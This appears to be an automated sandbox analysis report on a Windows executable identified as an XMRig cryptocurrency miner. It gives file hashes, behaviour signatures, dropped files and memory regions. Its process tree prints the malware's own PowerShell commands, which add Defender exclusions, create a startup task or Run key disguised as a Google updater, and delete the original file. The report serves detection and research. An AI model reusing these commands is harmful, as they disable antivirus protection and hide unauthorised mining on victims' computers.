Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1805s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3556
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:564
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1636
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:2128
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:232
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4796
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:2816
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3336
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2636

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            260KB

            MD5

            31c8843b1a1a1deab0db50caf47d5428

            SHA1

            4b05cde0d846778ecd57d4b507b9a77d44952b1f

            SHA256

            eb86014c094553340f1d5e51942a94605f9ae887d6f77158f05d897653c3735e

            SHA512

            7d48794a4344c1198f8cb08aea004cc5bd02ca454f765b258aba91ab88e47197d22cbd73d313637128d2dff8bb564dd51eb18782b103b34fe1a6169d3ce5968d

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            2e907f77659a6601fcc408274894da2e

            SHA1

            9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

            SHA256

            385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

            SHA512

            34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            418b0a6e892e4632f4e0da1c2f7c3bc7

            SHA1

            32d0980a0a8c9603a2c4642c89962d54758b31ff

            SHA256

            aa59c4d3fa9bf88542272c81e888175b1949eb6d97956f756203486f47876862

            SHA512

            b37ca481b9472e63ea8243fbc4d54f0681264629621c1b3cbb0a8470df04139da69575b87394aa2b35b1ca0c71b62bc211787de87d7f54ed29170a50500bd01d

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br4msrmx.vn0.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/960-0-0x00007FF67EED0000-0x00007FF67F0E1000-memory.dmp
            Filesize

            2.1MB

          • memory/960-37-0x00007FF67EED0000-0x00007FF67F0E1000-memory.dmp
            Filesize

            2.1MB

          • memory/1532-20-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/1532-21-0x000002D22A000000-0x000002D22A010000-memory.dmp
            Filesize

            64KB

          • memory/1532-22-0x000002D22A000000-0x000002D22A010000-memory.dmp
            Filesize

            64KB

          • memory/1532-33-0x000002D22A000000-0x000002D22A010000-memory.dmp
            Filesize

            64KB

          • memory/1532-35-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/1636-118-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/1636-115-0x000001BB7FC90000-0x000001BB7FCA0000-memory.dmp
            Filesize

            64KB

          • memory/1636-92-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/1636-93-0x000001BB7FC90000-0x000001BB7FCA0000-memory.dmp
            Filesize

            64KB

          • memory/1636-104-0x000001BB7FC90000-0x000001BB7FCA0000-memory.dmp
            Filesize

            64KB

          • memory/1636-114-0x00007FF4C4700000-0x00007FF4C4710000-memory.dmp
            Filesize

            64KB

          • memory/1636-116-0x000001BB7FC90000-0x000001BB7FCA0000-memory.dmp
            Filesize

            64KB

          • memory/2128-129-0x00007FF7AF970000-0x00007FF7AF986000-memory.dmp
            Filesize

            88KB

          • memory/2128-136-0x00007FF7AF970000-0x00007FF7AF986000-memory.dmp
            Filesize

            88KB

          • memory/2324-15-0x00000203FF2F0000-0x00000203FF300000-memory.dmp
            Filesize

            64KB

          • memory/2324-11-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/2324-13-0x00000203FF2F0000-0x00000203FF300000-memory.dmp
            Filesize

            64KB

          • memory/2324-12-0x00000203FF2F0000-0x00000203FF300000-memory.dmp
            Filesize

            64KB

          • memory/2324-1-0x00000203E5320000-0x00000203E5342000-memory.dmp
            Filesize

            136KB

          • memory/2324-14-0x00000203FF2F0000-0x00000203FF300000-memory.dmp
            Filesize

            64KB

          • memory/2324-18-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/2636-54-0x00007FF6414A0000-0x00007FF6416B1000-memory.dmp
            Filesize

            2.1MB

          • memory/2636-91-0x00007FF6414A0000-0x00007FF6416B1000-memory.dmp
            Filesize

            2.1MB

          • memory/2636-122-0x00007FF6414A0000-0x00007FF6416B1000-memory.dmp
            Filesize

            2.1MB

          • memory/2852-38-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/2852-39-0x00000297EA700000-0x00000297EA710000-memory.dmp
            Filesize

            64KB

          • memory/2852-40-0x00000297EA700000-0x00000297EA710000-memory.dmp
            Filesize

            64KB

          • memory/2852-53-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/3336-161-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-132-0x000001D88E590000-0x000001D88E5B0000-memory.dmp
            Filesize

            128KB

          • memory/3336-191-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-141-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-139-0x000001D88E590000-0x000001D88E5B0000-memory.dmp
            Filesize

            128KB

          • memory/3336-189-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-138-0x000001D88E570000-0x000001D88E590000-memory.dmp
            Filesize

            128KB

          • memory/3336-185-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-183-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-181-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-179-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-123-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-124-0x000001D88DE40000-0x000001D88DE60000-memory.dmp
            Filesize

            128KB

          • memory/3336-177-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-175-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-128-0x000001D88E530000-0x000001D88E570000-memory.dmp
            Filesize

            256KB

          • memory/3336-173-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-130-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-131-0x000001D88E570000-0x000001D88E590000-memory.dmp
            Filesize

            128KB

          • memory/3336-163-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-134-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-135-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-171-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-137-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-187-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-169-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-167-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-143-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-145-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-147-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-149-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-151-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-153-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-155-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-157-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-159-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/3336-165-0x00007FF76FB80000-0x00007FF770374000-memory.dmp
            Filesize

            8.0MB

          • memory/4948-86-0x00000158E0830000-0x00000158E0840000-memory.dmp
            Filesize

            64KB

          • memory/4948-82-0x00000158E2F10000-0x00000158E2F2A000-memory.dmp
            Filesize

            104KB

          • memory/4948-79-0x00000158E0800000-0x00000158E080A000-memory.dmp
            Filesize

            40KB

          • memory/4948-78-0x00000158E2CB0000-0x00000158E2D65000-memory.dmp
            Filesize

            724KB

          • memory/4948-83-0x00000158E2EC0000-0x00000158E2EC8000-memory.dmp
            Filesize

            32KB

          • memory/4948-84-0x00000158E2EF0000-0x00000158E2EF6000-memory.dmp
            Filesize

            24KB

          • memory/4948-85-0x00000158E2F00000-0x00000158E2F0A000-memory.dmp
            Filesize

            40KB

          • memory/4948-81-0x00000158E2EB0000-0x00000158E2EBA000-memory.dmp
            Filesize

            40KB

          • memory/4948-89-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/4948-55-0x00007FFE7D720000-0x00007FFE7E1E1000-memory.dmp
            Filesize

            10.8MB

          • memory/4948-56-0x00000158E0830000-0x00000158E0840000-memory.dmp
            Filesize

            64KB

          • memory/4948-66-0x00000158E0830000-0x00000158E0840000-memory.dmp
            Filesize

            64KB

          • memory/4948-67-0x00007FF4D9A10000-0x00007FF4D9A20000-memory.dmp
            Filesize

            64KB

          • memory/4948-77-0x00000158E0810000-0x00000158E082C000-memory.dmp
            Filesize

            112KB

          • memory/4948-80-0x00000158E2ED0000-0x00000158E2EEC000-memory.dmp
            Filesize

            112KB